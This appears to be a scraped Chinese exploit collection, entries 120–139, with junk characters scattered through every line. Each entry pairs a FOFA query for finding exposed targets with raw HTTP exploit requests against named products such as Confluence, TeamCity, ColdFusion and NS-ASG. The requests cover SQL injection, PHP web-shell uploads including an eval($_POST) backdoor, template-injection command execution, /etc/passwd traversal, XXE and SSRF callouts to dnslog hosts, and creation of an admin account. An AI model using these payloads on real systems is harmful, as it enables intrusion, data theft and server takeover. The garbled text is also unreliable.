' y8 N- h* G0 {4 e. M9 QX-Remote-Addr: 1.1.1.1) O) }" P5 Z5 C; h
Te: trailers
) x7 z5 Z: n$ k! d& aConnection: close
2 W7 Q2 {6 |. e( A* N9 W- E: T! n1 |( ~
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
9 A, n! \- A* [; r+ f5 o; E, P- T8 i
' s2 t: F+ [7 O1 w* I3 o120. 北京百绰智能S40管理平台导入web.php任意文件上传
% l) B- w( y$ n) {( n; A: J1 p' @! T6 rCVE-2024-1253
8 K! _3 Y7 L' l' L( Z. r9 nFOFA:title="Smart管理平台"! k9 B7 S2 C1 ^' }7 \6 |* f! Z
POST /useratte/web.php? HTTP/1.1
5 f9 m; L1 v& z$ r: bHost: ip:port1 [- n q3 x) V% @ m c
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
0 k$ J3 l$ p% V# f1 `& ~User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
, i, R# Z# M" f+ ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( i$ ]( B/ B8 B) q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 D$ x9 s$ T+ p% T S+ {
Accept-Encoding: gzip, deflate% t/ I& Y/ f! e. G
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
* q5 e1 j' @+ e( U1 }3 V) DContent-Length: 597- V J E2 z7 L4 c1 \
Origin: https://ip:port
5 ~/ [' C. {4 S! xReferer: https://ip:port/sysmanage/licence.php H% M. Z) j* ]3 R0 q
Upgrade-Insecure-Requests: 1 j& a/ W' \; k6 Q0 O& c3 B/ _
Sec-Fetch-Dest: document
2 q# k, ]% C! m/ ESec-Fetch-Mode: navigate3 [; L. I/ c" U: t& m, J4 B, _2 |) `
Sec-Fetch-Site: same-origin1 h5 v2 ]( Y. K% ~* f
Sec-Fetch-User: ?1
2 T. ]4 o' J. g! s4 {Te: trailers
! G/ s9 M, z6 yConnection: close, l# g5 \/ _3 d* t
9 F" s9 l& w8 f: l! G-----------------------------423289041236658752706300793288 s4 H. e- K3 J9 `' ]6 q8 K
Content-Disposition: form-data; name="file_upload"; filename="2.php"3 V4 L* _9 G& ~. Y/ z0 O) i& z @, ]
Content-Type: application/octet-stream/ H1 L8 s* Z# N. a1 Y$ t% Q
- }9 B2 P. F: E2 I3 G) w- s+ j
<?php phpinfo()?>: ^ ?1 c3 j |" x
-----------------------------42328904123665875270630079328
0 e/ M" g: ]7 MContent-Disposition: form-data; name="id_type"" J! t/ s9 n) ^ r- |
. @! l" h1 T$ ]- \9 [17 W5 h+ X# ^& j: w' E j7 l6 b
-----------------------------42328904123665875270630079328
8 o9 R* B9 F3 Q( ~7 V8 w5 y. |Content-Disposition: form-data; name="1_ck"
, v- [3 e4 ?( x& I0 ~0 `
& ~' C; ^ x. X @/ F1_radhttp+ B7 W7 Q8 m8 ]( P x/ b
-----------------------------42328904123665875270630079328
+ Y) J4 r$ a: `0 M0 I7 [Content-Disposition: form-data; name="mode"& t" k0 V) G, [. Y: E" f* z
! A9 D& I9 A: A/ Z: p0 L
import
9 {! P f* K9 t-----------------------------42328904123665875270630079328
6 l& J* l1 T3 b( v H# v6 b9 A$ Y: t3 Z% y I! r% n1 P1 \
- t% U7 d( o6 S5 S' u
文件路径/upload/2.php1 f) e% s$ P; B3 n' ~1 d9 g
2 r1 Q# V+ @/ J3 C: ?' M
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
0 t; w" O. L' ~( @1 o( iCVE-2024-1918
* l8 ~1 C; e; [! N2 ^( f: j; \FOFA:title="Smart管理平台"
( `. X5 w+ Y8 H# Z9 d- gPOST /useratte/userattestation.php HTTP/1.1- o+ ]6 f" d0 h7 @
Host: 192.168.40.130:8443
% M9 a W* @& n7 p5 mCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50- y+ n) l" H; v0 {$ J
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
( o/ d- ? T3 A& s+ HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# N+ H) q9 I- R v& x+ _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 m8 ~9 j' K8 m# p# k& o8 \6 yAccept-Encoding: gzip, deflate
! \4 x! H- h) }. [6 G8 `/ I3 Z/ BContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793285 Q& H3 v& K, T" \$ u) o/ u
Content-Length: 592
^" q0 b" T( nOrigin: https://192.168.40.130:8443
1 l) A' i# H, G( a) r+ E6 QUpgrade-Insecure-Requests: 18 p6 F. k5 A( f/ E7 O
Sec-Fetch-Dest: document
# G1 q1 K" f% i7 i% }Sec-Fetch-Mode: navigate4 X0 Y; r* {2 I" f+ R. X! W
Sec-Fetch-Site: same-origin
/ ~; J5 J, V7 v; ESec-Fetch-User: ?1
' b l, j, J( v. w# ^Te: trailers! y4 d: U; U) m0 E' S
Connection: close
, b, J6 Q6 U3 q, ?& S2 V1 H, I
, Y- N0 ^2 u& R2 M! B-----------------------------42328904123665875270630079328; X+ a9 L- ?* K$ p4 s' b. N
Content-Disposition: form-data; name="web_img"; filename="1.php"- A1 M0 @& f& [
Content-Type: application/octet-stream
# i4 S, A" ~9 H5 W+ C2 e
' Q3 D9 M& a; v5 L) u3 G+ h<?php phpinfo();?>: K8 n9 b9 g5 W( d% m' G/ i0 O3 ]
-----------------------------42328904123665875270630079328! P" d, L3 ~4 v P9 A& k: B
Content-Disposition: form-data; name="id_type"
# O6 `# F1 ?/ U6 ^2 O' o2 }1 y: x' r* Z" g4 h, E6 ~2 c+ _& Z
1
9 V$ u3 k7 }" a-----------------------------423289041236658752706300793284 a, T) E' B% u; Z
Content-Disposition: form-data; name="1_ck"
+ r. m" ~4 H5 @8 v( h7 @0 a* j% _. v. U$ I/ M5 o
1_radhttp. o: n, t! y; D, ^7 z
-----------------------------42328904123665875270630079328
, K( ~" R5 W$ g6 x$ s# n; Q6 b1 XContent-Disposition: form-data; name="hidwel"
& J4 v+ {) e6 T6 u. n0 J4 D( z. m/ F3 w7 `# H' W, U7 ?4 Z
set
% r4 e1 l- h3 K! \% V-----------------------------423289041236658752706300793280 l6 |9 M; v9 H' v' H5 R, l
+ `- v! H& B0 n6 {% G- v9 L
* F- z( }% [2 tboot/web/upload/weblogo/1.php
( k& d2 t5 d- H% C9 `+ w1 _
/ @7 I8 y4 p! G- i" S& c, ~122. 北京百绰智能s200管理平台/importexport.php sql注入% |$ t' w6 X( [/ y
CVE-2024-27718FOFA:title="Smart管理平台"3 B! S3 v4 B; n, {" Z7 k
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
/ E8 ?- u0 P3 W* |) CGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
. d0 ^6 c: F# P8 bHost: x.x.x.x
' T+ l5 @0 L8 V( l) `: cCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
4 E$ z( }5 `# V: ?9 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! k2 b; w5 R* G5 |. z; I7 C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& B6 |: I+ l* f9 V* }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 X& q- q; |4 W/ [Accept-Encoding: gzip, deflate, br
# l8 ^) R( w( t1 D. y, dUpgrade-Insecure-Requests: 1
3 M6 V4 K' k$ l! t8 @& v- k/ b! kSec-Fetch-Dest: document
: {# l( \. m4 t* b6 pSec-Fetch-Mode: navigate
! m& d- j O* R- k* q; \Sec-Fetch-Site: none
9 e |! {4 F& h5 TSec-Fetch-User: ?1
' P9 a% F/ J I4 v1 @6 S' pTe: trailers: [/ }+ |- C2 k
Connection: close
" g! F/ m; x* x/ @0 P; p# P R1 s; g. u) Z q& b
5 O( A3 }! b# c! l123. Atlassian Confluence 模板注入代码执行( O0 Z1 e% ~( I
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"" D. s8 S$ Q a& G9 p, c# K
POST /template/aui/text-inline.vm HTTP/1.1
; ^* l4 g, R0 w: Z+ tHost: localhost:8090
s, V8 _: R q7 u) R; [. p! VAccept-Encoding: gzip, deflate, br
8 _+ d+ ^% h) y% }, B# ]' w. ^Accept: */* }" y; W% j4 X1 Q9 T9 e/ f
Accept-Language: en-US;q=0.9,en;q=0.8
8 d3 ?7 h, {* U* W5 @9 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.366 W: d! i+ B! J
Connection: close
/ i* d0 w7 j9 W) C6 `4 `Content-Type: application/x-www-form-urlencoded
0 H- U, b. w4 l9 r
: a: C2 |- A4 nlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))7 ] D. u- H) Q* d- l+ }
# h- G7 y5 l1 s# M4 k3 v8 I- m* G$ f. ?, x7 `) Z/ U
124. 湖南建研工程质量检测系统任意文件上传6 X" J3 B% X# ^/ U! d7 H7 W0 o% S
FOFA:body="/Content/Theme/Standard/webSite/login.css", |9 v; t9 K, V3 w, [- W
POST /Scripts/admintool?type=updatefile HTTP/1.1: i: R1 [7 \9 R* }
Host: 192.168.40.130:82821 d C, \$ t9 \+ V* a, Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36& c! A- L( E& M3 u6 w( _2 }+ B
Content-Length: 72
0 j: z7 _6 u' X- WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8$ |$ d# D3 _5 t! e( R
Accept-Encoding: gzip, deflate, br
* Y! D! L* ]4 H& n& t) f- z# F/ mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ v, ~0 A9 Y5 d8 z* Q$ L! Q1 i
Connection: close" P; b/ Q0 h0 e; f/ t( H% w1 u3 u
Content-Type: application/x-www-form-urlencoded
" f$ m" i; F8 ^3 \8 f
1 h- K6 l6 U9 |, ~; yfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>* F2 ]" U" W- Y6 n" a- @2 u# C
, P% \3 o$ J/ _' U5 v) P S4 V
7 p/ O, Y. R6 M6 m1 n
http://192.168.40.130:8282/Scripts/abcgcg.aspx: `" e5 ^8 Z" \5 a% a
0 ^+ ]: x: W- j1 p" O" z$ O) i7 R
125. ConnectWise ScreenConnect身份验证绕过
$ m! \, L& ^1 {4 Y+ JCVE-2024-1709
3 @2 c- {2 a! ]2 R) d& sFOFA:icon_hash="-82958153"
6 A/ T8 @6 f5 ^% u6 t) A8 u( C4 |https://github.com/watchtowrlabs ... bypass-add-user-poc
# O8 v; s5 y' M% x- y Z& W7 S, ^. } K" ^
% c' X3 j' l6 Z" l2 _9 Y
使用方法
7 K/ }" n+ x. v1 Rpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
, F$ }; Z0 l$ b
) D. H N8 X# o& a( d
* Q! ~& X6 v6 y8 k1 s- y( R( d- q创建好用户后直接登录后台,可以执行系统命令。
" h. P! j) c7 h. x5 Y7 t2 X
! V4 T1 Q% q6 w4 Z126. Aiohttp 路径遍历2 M& p3 v3 R6 ~2 ?. {2 B- l
FOFA:title=="ComfyUI"$ X# o$ O8 c, E% v3 [
GET /static/../../../../../etc/passwd HTTP/1.1
# p& N: e6 J. H+ M' X1 {# UHost: x.x.x.x
8 d, L* K, i% P0 Y3 o2 _+ G9 SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" o& h0 L/ Z+ K& u& L( n2 a W
Connection: close
! s1 r$ Y6 q" t4 w, UAccept: */*
( x2 P* F8 l+ lAccept-Language: en. [0 G H* m" L$ Y; m
Accept-Encoding: gzip2 t: F; V% N& `+ j
% s1 k3 {! w5 y* R& ]6 f. g S- ^' P8 P! w3 n
127. 广联达Linkworks DataExchange.ashx XXE# A; q" k9 d& c3 J, u1 C7 }
FOFA:body="Services/Identification/login.ashx"
, t- V9 \2 N3 C1 h$ X+ _% b4 K3 q2 vPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1/ D7 x, T: u+ S' x9 X
Host: 192.168.40.130:8888
* p6 _8 q0 j& t/ }8 q G$ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36; q+ ~$ [9 v8 d. g/ G. p7 N7 p
Content-Length: 415( G+ ~( V# ]; [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 y2 B' p* h; V$ l1 y$ iAccept-Encoding: gzip, deflate
) U* @) r( q: x+ TAccept-Language: zh-CN,zh;q=0.99 p5 @8 C3 x8 e/ t, F4 f7 f, w
Connection: close( x9 \5 k2 S# R# S: U
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0& ]3 }1 V0 z- P
Purpose: prefetch
8 i% V- t* e' f5 R+ z& pSec-Purpose: prefetch;prerender( a& x+ J7 K2 {0 R/ k
$ @) T, v6 @7 M7 L------WebKitFormBoundaryJGgV5l5ta05yAIe0' _( U5 T( @( e. M3 S
Content-Disposition: form-data;name="SystemName" M" v& t* r2 w
/ W! i4 L6 ^6 W4 g3 o! _BIM
' W" X" _1 L% _7 Y7 p# S------WebKitFormBoundaryJGgV5l5ta05yAIe0
. g' p) l& r1 B) k' b* [Content-Disposition: form-data;name="Params"
2 x" g8 V1 x- p/ B& X& JContent-Type: text/plain5 X- p( S% I5 S- e6 E
$ W( M9 x+ Q( P% O6 ^
<?xml version="1.0" encoding="UTF-8"?>
5 C7 ?) W( f; {. q<!DOCTYPE test [- d8 j7 a7 W g$ q5 Y4 E& [& L
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
/ i1 z- l$ M" p9 I, [% r]9 i, y8 N2 V& g* n' R
>* W+ j5 e( W' v0 D% U$ e5 i8 k
<test>&t;</test>$ \4 H& t* }; o7 ]9 Q
------WebKitFormBoundaryJGgV5l5ta05yAIe0--$ z2 V3 V: F/ F9 d- k! m: \3 Y
; [6 |" @8 |5 |$ g7 ~5 V
: I: d) j& b6 `3 `: ]" i3 _0 ?# T1 ~) X5 E
128. Adobe ColdFusion 反序列化4 T# g" W8 L6 f7 `
CVE-2023-38203
6 h" L+ a* X+ Z9 }' d u8 NAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)& c6 r6 m9 I4 O) \: F4 J/ B
FOFA:app="Adobe-ColdFusion"5 h9 h( A+ @/ z2 B' S! E8 ?+ r
PAYLOAD2 w% z) ^8 A% W. r) a5 g
3 f7 o( }% z- n129. Adobe ColdFusion 任意文件读取" }5 P/ q0 F. N! o7 B2 ^2 s( }9 D5 R
CVE-2024-20767
% L9 v; ~, L' lFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
, Y i! U/ S/ T0 t! E8 M) |第一步,获取uuid
/ G6 u: ~/ g5 e1 L- e+ r: FGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 A! O; E3 A. n! Q
Host: x.x.x.x4 n- b% d% Y$ W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.369 I/ I( Z# L3 _4 i
Accept: */*. `3 B; P! Z l6 o( A2 S' ?0 u
Accept-Encoding: gzip, deflate0 V4 T) u( G+ v0 p1 ~
Connection: close/ s- B I# F3 q
+ v8 _+ x/ D- L% \6 u1 g% f! g/ ?4 B1 Z6 S/ k& P8 g% \
第二步,读取/etc/passwd文件3 J- a7 A9 x6 L4 J* [
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
& O/ @8 O+ f& [+ K5 iHost: x.x.x.x* B2 C' a+ [% c0 f: D/ }/ s+ _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) Q) l- H; v) M3 N/ g8 T/ k
Accept: */*& O! h9 Z/ p |
Accept-Encoding: gzip, deflate: W2 q1 L4 C7 _1 z: e
Connection: close
_; B" x+ w) Suuid: 85f60018-a654-4410-a783-f81cbd5000b9
, W" J" z9 @3 N) ]- T
* b4 }1 E2 N1 P( _8 _! A% U4 n% y6 G# Z! e7 a( x+ L. w( y
130. Laykefu客服系统任意文件上传' n# l" r5 a* L; z$ F1 X" ?
FOFA:icon_hash="-334624619"" p0 u6 L& N* B/ c! v, j3 I( J
POST /admin/users/upavatar.html HTTP/1.15 I. H, n/ J- _0 m8 F- Y) M
Host: 127.0.0.1
: \3 D# A) ^" s1 v! v2 `4 ]Accept: application/json, text/javascript, */*; q=0.01
0 i. J+ U5 C+ l% bX-Requested-With: XMLHttpRequest' f, ]) d% G/ u' S( r( F4 W; Y5 }
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26$ S+ Y, d) j* a$ ~. [0 F6 V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR. S" v" r: I* i! }/ Y
Accept-Encoding: gzip, deflate6 q! q3 ]9 z( d; i4 i$ v! G( H
Accept-Language: zh-CN,zh;q=0.9
q _; K( Q8 T9 ]! BCookie: user_name=1; user_id=31 I9 S" a R# M8 {9 x: J
Connection: close/ g, }4 }' e( J* D
G% }( V1 e! n, u9 x$ }& `
------WebKitFormBoundary3OCVBiwBVsNuB2kR. u3 `' \1 O- Y7 v: S9 r
Content-Disposition: form-data; name="file"; filename="1.php"
/ e$ f( _- @7 AContent-Type: image/png: }" F" v S/ _# T
3 S7 z. i; m: d3 s: Y# Z \' e4 v
<?php phpinfo();@eval($_POST['sec']);?>
) s. E6 F3 y9 h" O& u. Q( g* B------WebKitFormBoundary3OCVBiwBVsNuB2kR--$ P! c9 W) N. X" p" U* v& J3 h
$ a) R" Z5 M4 h& f+ W, L
) `# X! b) @5 ^5 {131. Mini-Tmall <=20231017 SQL注入' ]( P5 }" T* p6 g1 J
FOFA:icon_hash="-2087517259"
& A% l' H$ Q" x后台地址:http://localhost:8080/tmall/admin; r5 Y( H. x: K6 f+ j9 c1 `
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
h k; {4 F' w; |- L+ Z# J# i3 y. Y8 e, [% e
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过/ s& f) Z/ `9 H! x
CVE-2024-27198
) {' \* d7 L: Q0 ~FOFA:body="Log in to TeamCity"
+ m7 {- a! d; E, IPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1- s4 Z. ~+ [) l
Host: 192.168.40.130:81119 c! V# ?8 t/ o% a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 e5 g1 M8 N3 d4 a7 @- E" c& G- ZAccept: */*
6 o# ~+ c& v8 E$ p: ~' C; K) z0 RContent-Type: application/json
0 I9 Y4 [, r$ A; S7 HAccept-Encoding: gzip, deflate+ n: F9 V c) `8 M# ]7 e- X3 @
% g9 p# X" @+ B# [- Z' C
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}- @8 P9 z. [$ F/ `7 }0 _7 ]: g7 \
W; A$ Y) g- S6 v
g! s+ b+ Q+ Y% u! lCVE-2024-27199
3 j3 U# r& \) l6 C ~2 ]: g/res/../admin/diagnostic.jsp7 U8 c+ {6 c& ~) f* }7 D
/.well-known/acme-challenge/../../admin/diagnostic.jsp4 |" ~2 C$ \3 Y
/update/../admin/diagnostic.jsp
O- O- ~8 E a
4 N! c& Q4 v& b! N* k3 ?/ r V& b! W% a! h+ [ \
CVE-2024-27198-RCE.py7 a, D7 s7 u) V6 W
( v8 j: l' A/ E, t9 X1 g133. H5 云商城 file.php 文件上传
1 a- U: A6 d4 K, R1 kFOFA:body="/public/qbsp.php"4 c E5 p4 Y V) q; w8 l
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
- t. G8 O7 R( F rHost: your-ip7 G$ i ~0 ], T4 l4 D1 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- F. u; h+ K6 [- v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx5 M* O+ O) e: G, N% ?& \* M1 G# H' S
2 r5 j: i; x/ B/ h
------WebKitFormBoundaryFQqYtrIWb8iBxUCx {: e! O* B3 j- Y. c8 y$ i2 Z
Content-Disposition: form-data; name="file"; filename="rce.php"3 G8 I9 r) {1 S
Content-Type: application/octet-stream/ |3 J& K3 o! P% N0 o% _' _
5 K+ @# e" A! B) A
<?php system("cat /etc/passwd");unlink(__FILE__);?>
: B' ~8 c! i# [ L0 N& e/ [------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
% U9 m! i4 L: i3 j- }7 I7 J! ?6 b s3 k. e
' Z- B ~+ ^# k; p
* h, W$ R" z2 |, }" {
134. 网康NS-ASG应用安全网关index.php sql注入' p3 v( b! T6 y$ J. b8 `; D
CVE-2024-2330( {; o' P3 q) j+ d8 u
Netentsec NS-ASG Application Security Gateway 6.3版本
- s9 P& q6 |1 \9 X+ BFOFA:app="网康科技-NS-ASG安全网关"
# Q1 V4 R/ S+ m ]! `+ p& Z' RPOST /protocol/index.php HTTP/1.1
, y p, Q+ {6 [Host: x.x.x.x4 p) m2 Y3 A/ T. _+ I7 f
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
0 x- j% ^3 d1 M, i/ J, eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
" i7 }( l$ p4 i+ p! F0 r1 VAccept: */*
3 Q7 s, T) W8 c8 A. }1 H. fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- i8 M& `3 w; D) Q; q4 J+ u" m, ]
Accept-Encoding: gzip, deflate) r* A8 v3 x$ u* b- S2 H, a
Sec-Fetch-Dest: empty
( U% v/ n' u5 ^& NSec-Fetch-Mode: cors) C4 w% L4 e/ o" M" y) c
Sec-Fetch-Site: same-origin
, p* [# ^* ?( kTe: trailers3 N, v$ ~0 ~ Y1 k9 R) b* X' w0 U
Connection: close5 F! D& T: D, `: C2 `
Content-Type: application/x-www-form-urlencoded
- p8 `6 J4 E+ i- l: S- XContent-Length: 263 p( }/ Q. s4 ~' C
- z$ g/ ] e3 U# X8 ~
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
/ ]9 e2 w, G6 B5 M$ G0 p; {' n
. r- |( |+ C2 {- y) {' @$ g k7 X" w9 ], E
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入$ X7 V, o) N- J
CVE-2024-2022, d; A. x4 K9 r8 [2 Z/ W
Netentsec NS-ASG Application Security Gateway 6.3版本
% ] `' Y3 N. y( tFOFA:app="网康科技-NS-ASG安全网关"$ L$ A* D7 Y/ Y( a( ? D; V7 F: s
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1; O" @2 Y& Z5 p! q1 O
Host: x.x.x.x1 n$ e0 S8 J: r9 I% w; b' ^2 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 o& ?3 H0 Q7 ?1 ?' f( Z& n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* U& {; {2 t( |; Z3 U0 b
Accept-Encoding: gzip, deflate
6 _: \+ K7 j6 P' M3 K+ f ^( c/ XAccept-Language: zh-CN,zh;q=0.9" ?2 _5 a# A5 x, M, y* u
Connection: close
- d% n2 E/ T; @/ H" U* y. p
% J3 d1 p6 C6 n! [. k+ I% J1 U Z& ?1 Q- o9 M; U& L4 H: M
136. NextChat cors SSRF
- ?$ ^8 q- R* N. |8 [CVE-2023-49785
. K) w; g- m9 eFOFA:title="NextChat"
9 l" T% i) w, H* ^9 GGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.15 K0 u6 h2 e/ B* F/ l# _' M" k" W
Host: x.x.x.x:10000
8 {0 w8 p/ l7 g7 W7 |4 S( _6 R5 ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" o/ t2 r# e" g# V: k
Connection: close
5 v0 b( l+ b1 e: N/ y; Y1 EAccept: */*
/ [. u5 d, X' V: g; M$ CAccept-Language: en
7 D# X0 [/ Z8 ^) v$ o2 W4 ^Accept-Encoding: gzip* \5 Z! _# e0 p! n
$ U4 U5 x* W8 m- f$ y
! ^ R3 \) g" m% K137. 福建科立迅通信指挥调度平台down_file.php sql注入
% X3 y' b! I% B* Z DCVE-2024-2620" g1 d- R8 Y; ~" G r9 I
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
9 ~' u. o( n6 @. c DGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.11 w" a. M8 k5 j7 W! k7 Z8 U, i
Host: x.x.x.x
0 W! o$ V Y1 E2 N- U: ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. T( s/ y# k. v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% u+ `9 ~! q2 q" @1 z$ u( D! xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! c( [4 \) g' E& z2 OAccept-Encoding: gzip, deflate, br; @! ^5 x/ _1 }; m
Connection: close
, N' U" }: [( Y' D0 NCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
; Q& e7 d6 h+ O2 oUpgrade-Insecure-Requests: 1
5 |9 C, x8 m6 w7 j5 J( y3 L( Q5 X7 I/ C2 T- ]) {4 P- W+ K# U2 Y0 Q
8 q) w) K& J0 Q& ]6 a
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入: E D5 _# Y8 Q0 ^( e
CVE-2024-26215 @, K3 {/ a9 g* V& g; E
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"( k- T/ }/ o1 J0 j8 t) y
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
+ W# P& R: K( h+ M- h% l7 o! V" |Host: x.x.x.x
3 f( E) L+ S( r- |: z. I: MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ ~/ L, q! F* u8 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 i- w+ a* e9 z" e& {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ Z3 K+ E* }( {$ `" R
Accept-Encoding: gzip, deflate, br
# b! _4 U% D4 N5 mConnection: close
) R2 }9 ^! A, m. O/ \! m' e' mUpgrade-Insecure-Requests: 1" D- V+ n- u, k# S& l
1 s( D: a$ q$ @' z, r
: ^' y1 X# G/ F0 u, {2 o; l! h139. 福建科立讯通信指挥调度平台editemedia.php sql注入
% _0 M+ v( d/ G; p/ T+ ZCVE-2024-26221 T7 @& p e9 W' L/ s
